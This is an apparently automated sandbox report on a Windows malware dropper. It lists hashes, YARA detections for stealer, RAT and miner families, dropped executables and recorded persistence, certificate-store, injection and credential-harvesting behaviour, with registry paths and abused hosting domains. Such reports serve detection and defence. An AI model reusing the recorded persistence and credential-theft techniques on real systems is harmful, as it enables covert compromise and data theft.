purelogstealer | 2fcad226b17131da4274e1b9f8f31359bdd325c9568665f08fd1f6c5d06a23ce

Resubmissions

09-04-2024 08:32

240409-kfg77aaf85 10

09-04-2024 08:32

09-04-2024 08:32

09-04-2024 08:32

11-03-2024 08:03

10-03-2024 15:15

Analysis

max time kernel
230s
max time network
601s
platform
windows11-21h2_x64
resource
win11-20240221-en
resource tags

arch:x64arch:x86image:win11-20240221-enlocale:en-usos:windows11-21h2-x64system
submitted
09-04-2024 08:32

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

FUCKER.exe
Size

10KB
MD5

2a94f3960c58c6e70826495f76d00b85
SHA1

e2a1a5641295f5ebf01a37ac1c170ac0814bb71a
SHA256

2fcad226b17131da4274e1b9f8f31359bdd325c9568665f08fd1f6c5d06a23ce
SHA512

fbf55b55fcfb12eb8c029562956229208b9e8e2591859d6336c28a590c92a4d0f7033a77c46ef6ebe07ddfca353aba1e84b51907cd774beab148ee901c92d62f
SSDEEP

192:xlwayyHOXGc20L7BIW12n/ePSjiTlzkGu8stYcFwVc03KY:xlwwHe/20PKn/cLTlHuptYcFwVc03K

Score

10^/10

purelogstealer redline stealc xmrig xworm zgrat discovery evasion infostealer miner persistence pyinstaller rat spyware stealer trojan

Malware Config

Signatures

Detect Xworm Payload 2 IoCs

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\Files\first.exe	family_xworm
C:\Users\Admin\AppData\Local\Temp\Files\BrawlB0t.exe	family_xworm

Detect ZGRat V1 3 IoCs

Processes:

resource	yara_rule
behavioral4/memory/704-299-0x000001F4C69D0000-0x000001F4CA2C8000-memory.dmp	family_zgrat_v1
behavioral4/memory/704-328-0x000001F4E4A90000-0x000001F4E4BA0000-memory.dmp	family_zgrat_v1
behavioral4/memory/704-338-0x000001F4E4930000-0x000001F4E4954000-memory.dmp	family_zgrat_v1

PureLog Stealer
PureLog Stealer is an infostealer written in C#.
stealer purelogstealer

PureLog Stealer payload 1 IoCs

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\Files\Nvokcuobkn.exe	family_purelog_stealer

RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine payload 3 IoCs

Processes:

resource	yara_rule
behavioral4/memory/3204-28-0x00000000014F0000-0x000000000157C000-memory.dmp	family_redline
C:\Users\Admin\AppData\Local\Temp\Files\mk.exe	family_redline
C:\Users\Admin\AppData\Local\Temp\Files\FATTHER.exe	family_redline

Stealc
Stealc is an infostealer written in C++.
stealer stealc

XMRig Miner payload 2 IoCs

miner

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\Files\$77_oracle.exe	family_xmrig
C:\Users\Admin\AppData\Local\Temp\Files\$77_oracle.exe	xmrig

Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm
ZGRat
ZGRat is remote access trojan written in C#.
rat zgrat
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig
Blocklisted process makes network request 3 IoCs

Processes:

Assistenza%20Launcher.exe

flow pid process

13 2444 Assistenza%20Launcher.exe
16 2444 Assistenza%20Launcher.exe
18 2444 Assistenza%20Launcher.exe
Downloads MZ/PE file

flow	pid	process
13	2444	Assistenza%20Launcher.exe
16	2444	Assistenza%20Launcher.exe
18	2444	Assistenza%20Launcher.exe

Sets file execution options in registry 2 TTPs 25 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

$77_loader.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\nlbrute.exe	$77_loader.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\nlbrute.exe\PerfOptions\CpuPriorityClass = "3"	$77_loader.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\netsh.exe	$77_loader.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\$77_executeoracle.exe\PerfOptions\CpuPriorityClass = "3"	$77_loader.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\masscan.exe\PerfOptions	$77_loader.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\$77_executeoracle.exe	$77_loader.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\netstat.exe\PerfOptions	$77_loader.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\nlbrute.exe\PerfOptions	$77_loader.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options	$77_loader.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\$77_oracle.exe\PerfOptions\CpuPriorityClass = "3"	$77_loader.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\netstat.exe	$77_loader.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\netsh.exe\PerfOptions\CpuPriorityClass = "3"	$77_loader.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\$77_loader.exe\PerfOptions	$77_loader.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\netsh.exe\PerfOptions	$77_loader.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\netstat.exe\PerfOptions\CpuPriorityClass = "3"	$77_loader.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\masscan.exe	$77_loader.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\$77_oracle.exe\PerfOptions	$77_loader.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\$77_executeoracle.exe\PerfOptions	$77_loader.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\masscan.exe\PerfOptions\CpuPriorityClass = "3"	$77_loader.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\nlx64.exe\PerfOptions	$77_loader.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\nlx64.exe	$77_loader.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\nlx64.exe\PerfOptions\CpuPriorityClass = "3"	$77_loader.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\$77_loader.exe	$77_loader.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\$77_oracle.exe	$77_loader.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\$77_loader.exe\PerfOptions\CpuPriorityClass = "3"	$77_loader.exe

Drops startup file 2 IoCs

Processes:

first.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\first.exe	first.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\first.exe	first.exe

Executes dropped EXE 26 IoCs

Processes:

$77_loader.exeyoffens_crypted_EASY.exeISetup2.exeAssistenza%20Launcher.exeu3hg.0.exesys.exeu3hg.1.exeCAKKKFBFID.exepoolsdnkjfdbndklsnfgb.exeQmpjm.exelivecall.exelivecall.exe$77_oracle.exe$77_oracle.exemk.exeRMS.exeghjkl.exehack1226.exe1bz7KfahvU.exefirst.exeelevator.exesocks5-clean.exegookcom.exeKB824105-x86-ENU.exeinstaller.exeNINJA.exe

pid	process
2584	$77_loader.exe
3204	yoffens_crypted_EASY.exe
4516	ISetup2.exe
2444	Assistenza%20Launcher.exe
1560	u3hg.0.exe
1572	sys.exe
4968	u3hg.1.exe
4972	CAKKKFBFID.exe
2220	poolsdnkjfdbndklsnfgb.exe
3316	Qmpjm.exe
4764	livecall.exe
4904	livecall.exe
2120	$77_oracle.exe
668	$77_oracle.exe
3864	mk.exe
4732	RMS.exe
2276	ghjkl.exe
2020	hack1226.exe
2088	1bz7KfahvU.exe
416	first.exe
3896	elevator.exe
2912	socks5-clean.exe
3900	gookcom.exe
1444	KB824105-x86-ENU.exe
4992	installer.exe
1792	NINJA.exe

Loads dropped DLL 4 IoCs

Processes:

u3hg.0.exelivecall.exelivecall.exe

pid process

1560 u3hg.0.exe
1560 u3hg.0.exe
4764 livecall.exe
4904 livecall.exe
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

pid	process
1560	u3hg.0.exe
1560	u3hg.0.exe
4764	livecall.exe
4904	livecall.exe

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

1bz7KfahvU.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-4280069375-290121026-380765049-1000\Software\Microsoft\Windows\CurrentVersion\Run\runtime_1 = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\config\\runtime.exe"	1bz7KfahvU.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4280069375-290121026-380765049-1000\Software\Microsoft\Windows\CurrentVersion\Run\runtime_2 = "C:\\Users\\Admin\\AppData\\Local\\Microsoft\\config\\runtime.exe"	1bz7KfahvU.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Legitimate hosting services abused for malware hosting/C2 1 TTPs 15 IoCs

Web Service

T1102

Processes:

flow	ioc
1	raw.githubusercontent.com
21	bitbucket.org
114	raw.githubusercontent.com
153	raw.githubusercontent.com
160	raw.githubusercontent.com
22	raw.githubusercontent.com
23	raw.githubusercontent.com
99	raw.githubusercontent.com
112	raw.githubusercontent.com
113	raw.githubusercontent.com
44	raw.githubusercontent.com
73	bitbucket.org
77	raw.githubusercontent.com
117	raw.githubusercontent.com
155	raw.githubusercontent.com

Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

21 ip-api.com

flow	ioc
21	ip-api.com

Modifies WinLogon 2 TTPs 3 IoCs

persistence

Winlogon Helper DLL

T1547.004

Modify Registry

T1112

Processes:

$77_loader.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList	$77_loader.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts	$77_loader.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\adm = "0"	$77_loader.exe

Modifies powershell logging option 1 TTPs
evasion

Modify Registry
T1112

Suspicious use of SetThreadContext 2 IoCs

Processes:

livecall.execmd.exe

description	pid	process	target process
PID 4904 set thread context of 1972	4904	livecall.exe	cmd.exe
PID 1972 set thread context of 244	1972	cmd.exe	MSBuild.exe

Drops file in Program Files directory 1 IoCs

Processes:

Assistenza%20Launcher.exe

description ioc process

File created C:\Program Files\Assistenza Geacon\Assistenza Updater.exe Assistenza%20Launcher.exe

description	ioc	process
File created	C:\Program Files\Assistenza Geacon\Assistenza Updater.exe	Assistenza%20Launcher.exe

Drops file in Windows directory 2 IoCs

Processes:

$77_loader.exe

description	ioc	process
File created	C:\Windows\SoftwareDistribution\config.xml	$77_loader.exe
File opened for modification	C:\Windows\SoftwareDistribution\config.xml	$77_loader.exe

Detects Pyinstaller 1 IoCs

pyinstaller

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\Files\igfxCUIService%20Module.exe	pyinstaller

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 6 IoCs

Processes:

WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exe

pid	pid_target	process	target process
4996	4516	WerFault.exe	ISetup2.exe
4628	4516	WerFault.exe	ISetup2.exe
1544	1560	WerFault.exe	u3hg.0.exe
3080	3900	WerFault.exe	gookcom.exe
5992	3900	WerFault.exe	gookcom.exe
4940	4960	WerFault.exe	sadfbsdaf6.exe

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

u3hg.1.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	u3hg.1.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	u3hg.1.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	u3hg.1.exe

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

u3hg.0.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	u3hg.0.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	u3hg.0.exe

Creates scheduled task(s) 1 TTPs 4 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task/Job
T1053

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exe

pid process

3652 schtasks.exe
232 schtasks.exe
2788 schtasks.exe
4428 schtasks.exe
Gathers network information 2 TTPs 6 IoCs
Uses commandline utility to view network configuration.

System Information Discovery
T1082

Command and Scripting Interpreter
T1059

Processes:

NETSTAT.EXENETSTAT.EXENETSTAT.EXENETSTAT.EXENETSTAT.EXENETSTAT.EXE

pid process

4804 NETSTAT.EXE
3916 NETSTAT.EXE
2216 NETSTAT.EXE
1264 NETSTAT.EXE
2632 NETSTAT.EXE
3472 NETSTAT.EXE

pid	process
3652	schtasks.exe
232	schtasks.exe
2788	schtasks.exe
4428	schtasks.exe

pid	process
4804	NETSTAT.EXE
3916	NETSTAT.EXE
2216	NETSTAT.EXE
1264	NETSTAT.EXE
2632	NETSTAT.EXE
3472	NETSTAT.EXE

Modifies system certificate store 2 TTPs 5 IoCs

evasion spyware trojan

Install Root Certificate

T1553.004

Modify Registry

T1112

Processes:

poolsdnkjfdbndklsnfgb.exe

description	ioc	process
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 5c0000000100000004000000000800001900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef453000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286040000000100000010000000497904b0eb8719ac47b0bc11519b74d0200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	poolsdnkjfdbndklsnfgb.exe
Key created	\REGISTRY\USER\S-1-5-21-4280069375-290121026-380765049-1000\Software\Microsoft\SystemCertificates\CA\Certificates\78E50262E8C47571FB82D5063A6C9BD91BB8A325	poolsdnkjfdbndklsnfgb.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-4280069375-290121026-380765049-1000\Software\Microsoft\SystemCertificates\CA\Certificates\78E50262E8C47571FB82D5063A6C9BD91BB8A325\Blob = 03000000010000001400000078e50262e8c47571fb82d5063a6c9bd91bb8a325140000000100000014000000ef4c0092a6fb762e5e95e2c95f871b19d54de2d904000000010000001000000003f6e71fa4328959fc11dbda6e2594a00f0000000100000030000000effb32d2d626fdd3cedd8f30be7db5bedc8f636cb1eb2b41256bf77805094c42d35fa47f4ec6029a846c8ccb1c691438190000000100000010000000dfd7f624560e51db4e9ed98d584f0a405c0000000100000004000000000c0000180000000100000010000000ea6089055218053dd01e37e1d806eedf4b0000000100000044000000300037004300450046003200460036003500340045003300450044003600300035003000460046004300390042003600450042003800340034003200350030005f00000020000000010000004e0600003082064a30820432a003020102021100835b7615206d2d6e097e0b6e409fefc0300d06092a864886f70d01010c0500308188310b3009060355040613025553311330110603550408130a4e6577204a6572736579311430120603550407130b4a65727365792043697479311e301c060355040a131554686520555345525452555354204e6574776f726b312e302c06035504031325555345525472757374205253412043657274696669636174696f6e20417574686f72697479301e170d3232313131363030303030305a170d3332313131353233353935395a3044310b300906035504061302555331123010060355040a1309496e7465726e6574323121301f06035504031318496e436f6d6d6f6e20525341205365727665722043412032308201a2300d06092a864886f70d01010105000382018f003082018a028201810089f05cc438bad03457af9755a0f42243fc3e18113adb6d7a52210631d6d4b7b7928886858ff899ff1885a29d2b5ae1f8042149de44af405f9a22112c3a7b9747a995892a54c79dc733902923314855b7781aa63ab60c1a3f3bbf5d123fe039b3fa1a0b5bf8bfcc3d7d897bd2f79a9f354f2a3fbff7fd449fdbf54d494366b8c2a5691830928bae7b4bac89d60aed5f16df37bead316f591d89b5628d4c89dc372583dc6855cbfec6d3d3f04c0bbb874aaa4724e41132dffb3ec55ad73c735d9ff927ef98a1ca155a8aa4d3ed80c92bc2ac1a3a038e0f8434d008a1553f94cc9e8c9a134f1a0fbf5dfd016af9972821834efe6ecd078e743df9a3f670d7a5780b8278b688f558b63b864561af3286f945898929fc1efddd5138f87649de241350ad47dc21f4c7577802b4ac179f57979abc611feb56bbd455c2c0de8111b4b36f0e31d55e3b096366f62b5234689aeb4d3b91b3ca7bde5712550a7dc26e7eda7382fee6fc0f360b34e0374e006ccd61d1b9b7aaf2c983e8b122c7d81f2a0cdcf10203010001a38201703082016c301f0603551d230418301680145379bf5aaa2b4acf5480e1d89bc09df2b20366cb301d0603551d0e04160414ef4c0092a6fb762e5e95e2c95f871b19d54de2d9300e0603551d0f0101ff04040302018630120603551d130101ff040830060101ff020100301d0603551d250416301406082b0601050507030106082b0601050507030230220603551d20041b3019300d060b2b06010401b231010202673008060667810c01020230500603551d1f044930473045a043a041863f687474703a2f2f63726c2e7573657274727573742e636f6d2f55534552547275737452534143657274696669636174696f6e417574686f726974792e63726c307106082b0601050507010104653063303a06082b06010505073002862e687474703a2f2f6372742e7573657274727573742e636f6d2f55534552547275737452534141414143412e637274302506082b060105050730018619687474703a2f2f6f6373702e7573657274727573742e636f6d300d06092a864886f70d01010c0500038202010026800d34e41eae22beaf3ea6e284f9c6b725b1f7db2fa875c26a82acc3b6ce5b82c6a906cc11632a639972de975d50d94eb0af24a57652230510d9f0087c34eb3ce40e8c28940b694f6a1f34721bac365104f3470c76b1e637d0c92cdd97487bdae3b39ac46258883a1f43c32f305132715f39987ff0351a4a78249a74c48842551d60092397e495bad7ce64c22776e366ec2e6d2f09004003fad0831bcba48b59842f544bfaf7de582d5ff7181730788c639df97b36b04014946caef20acba2162192058dea1ab2a0574ea66ae5f32bbb092195ee099541ff6f8b05410c82a6fb6ccb0e8fe7851924f3103405bd41a8fcf26cf112495878cb9ad9e5bcc1e0ba3660dd3ad4757df870e79c80c17df34889c00276fe091b219fa5b4bac6c8b7502375e72a5a1b8dcf26a4345270500ee47ad22a3502979236462191a1d0f5393fd02e00f84337316fca16e539dde1cb5655fdb2cd621b60097d592d699da5fd26d8ee9cbc25460c90bfe3a990518cd903eacaec9a927abad50c98096dee6d7e7135fcebf54405ce43a7d55fb83ea135b34a0d283b631c8455a06a044b4de5da698f8c52882aece8bc4b1e7368deb1bc54945f35541d8056cc6fb74e201a24925cdf994ebd952d24832cf6999309996d86fe184475d74958787715c2e2d8c69e622395445acb1ed26f5c475fd9a11a6742ce6f65e8df33ba049be35e576fdb0a0d	poolsdnkjfdbndklsnfgb.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349	poolsdnkjfdbndklsnfgb.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 040000000100000010000000497904b0eb8719ac47b0bc11519b74d00f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	poolsdnkjfdbndklsnfgb.exe

Runs net.exe
Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery
T1018

Processes:

PING.EXE

pid process

2248 PING.EXE
Suspicious behavior: AddClipboardFormatListener 1 IoCs

Processes:

first.exe

pid process

416 first.exe

pid	process
2248	PING.EXE

pid	process
416	first.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

$77_loader.exeu3hg.0.exeyoffens_crypted_EASY.exepoolsdnkjfdbndklsnfgb.exeSystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exelivecall.exelivecall.execmd.exepowershell.exegookcom.exe

pid	process
2584	$77_loader.exe
2584	$77_loader.exe
2584	$77_loader.exe
2584	$77_loader.exe
2584	$77_loader.exe
1560	u3hg.0.exe
1560	u3hg.0.exe
3204	yoffens_crypted_EASY.exe
1560	u3hg.0.exe
1560	u3hg.0.exe
2220	poolsdnkjfdbndklsnfgb.exe
704	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe
704	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe
704	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe
704	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe
704	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe
704	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe
704	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe
704	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe
704	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe
704	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe
704	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe
704	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe
704	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe
704	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe
704	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe
704	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe
704	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe
2220	poolsdnkjfdbndklsnfgb.exe
4764	livecall.exe
4904	livecall.exe
4904	livecall.exe
1972	cmd.exe
1972	cmd.exe
2584	$77_loader.exe
2584	$77_loader.exe
2584	$77_loader.exe
2584	$77_loader.exe
2584	$77_loader.exe
2584	$77_loader.exe
2584	$77_loader.exe
2584	$77_loader.exe
3304	powershell.exe
